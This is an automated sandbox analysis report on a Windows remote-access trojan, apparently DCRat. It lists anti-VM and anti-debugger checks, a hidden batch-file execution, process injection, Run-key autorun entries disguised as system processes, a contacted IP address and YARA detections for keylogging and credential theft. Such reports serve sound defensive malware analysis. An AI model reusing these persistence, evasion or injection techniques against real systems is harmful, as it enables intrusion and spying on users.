Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Aug. 19, 2021, 9:33 a.m.	total_number_of_free_bytes: 10932117504 free_bytes_available: 10932117504 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0
GetDiskFreeSpaceExW Aug. 19, 2021, 9:34 a.m.	total_number_of_free_bytes: 10925576192 free_bytes_available: 10925576192 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\iU1rFtZLOF.bat

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\iU1rFtZLOF.bat"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\iU1rFtZLOF.bat

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 19, 2021, 9:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\iU1rFtZLOF.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\iU1rFtZLOF.bat	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 19, 2021, 9:34 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00165200', u'virtual_address': u'0x00002000', u'entropy': 6.800670645209383, u'name': u'.text', u'virtual_size': u'0x001650c4'}

entropy

6.80067064521

description

A section with a high entropy has been found

entropy

0.984493452791

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 19, 2021, 9:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Aug. 19, 2021, 9:34 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (30 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

chcp 65001

Communicates with host for which no DNS query was performed (1 event)

host

75.2.37.224

Installs itself for autorun at Windows startup (4 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss	reg_value	"C:\Windows\System32\dmusic\csrss.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss	reg_value	"C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\csrss.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchIndexer	reg_value	"C:\Windows\System32\rasmans\SearchIndexer.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost	reg_value	"C:\Sandbox\test22\DefaultBox\user\current\Favorites\Links\taskhost.exe"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2316 resumed a thread in remote process 2452
NtResumeThread Aug. 19, 2021, 9:34 a.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 2452	1	0	0

File has been identified by 44 AntiVirus engines on VirusTotal as malicious (44 events)

Lionic	Trojan.MSIL.LightStone.m!c
Elastic	malicious (high confidence)
DrWeb	BackDoor.QuasarNET.5
MicroWorld-eScan	Trojan.MSIL.Basic.8.Gen
FireEye	Generic.mg.080dea74b4e8c480
ALYac	Trojan.MSIL.Basic.8.Gen
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Spyware ( 005807381 )
Alibaba	Backdoor:MSIL/SpyNoon.d1619408
K7GW	Spyware ( 005807381 )
CrowdStrike	win/malicious_confidence_90% (W)
Arcabit	Trojan.MSIL.Basic.8.Gen
BitDefenderTheta	Gen:NN.ZemsilF.34088.Ar0@a4J2nJmi
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Spy.Agent.DEK
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Malware.Uztuby-9848412-0
Kaspersky	HEUR:Backdoor.MSIL.LightStone.gen
BitDefender	Trojan.MSIL.Basic.8.Gen
Avast	Win32:TrojanX-gen [Trj]
Ad-Aware	Trojan.MSIL.Basic.8.Gen
Sophos	Mal/Generic-R + Mal/SpyNoon-A
TrendMicro	TROJ_GEN.R002C0DHH21
McAfee-GW-Edition	BehavesLike.Win32.Drixed.th
Emsisoft	Trojan-Spy.Agent (A)
Ikarus	Trojan.MSIL.Spy
MaxSecure	Trojan.Malware.300983.susgen
MAX	malware (ai score=81)
Microsoft	Trojan:MSIL/SpyNoon.RTU!MTB
GData	Trojan.MSIL.Basic.8.Gen
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.DC.C4552416
McAfee	GenericRXJH-DC!080DEA74B4E8
Malwarebytes	Backdoor.DCRat
TrendMicro-HouseCall	TROJ_GEN.R002C0DHH21
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_99%
Fortinet	MSIL/Agent.DEK!tr
AVG	Win32:TrojanX-gen [Trj]
Cybereason	malicious.4b4e8c
Panda	Trj/GdSda.A
Qihoo-360	Win32/Backdoor.LightStone.HgIASagA

CrtCommonwinbroker.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All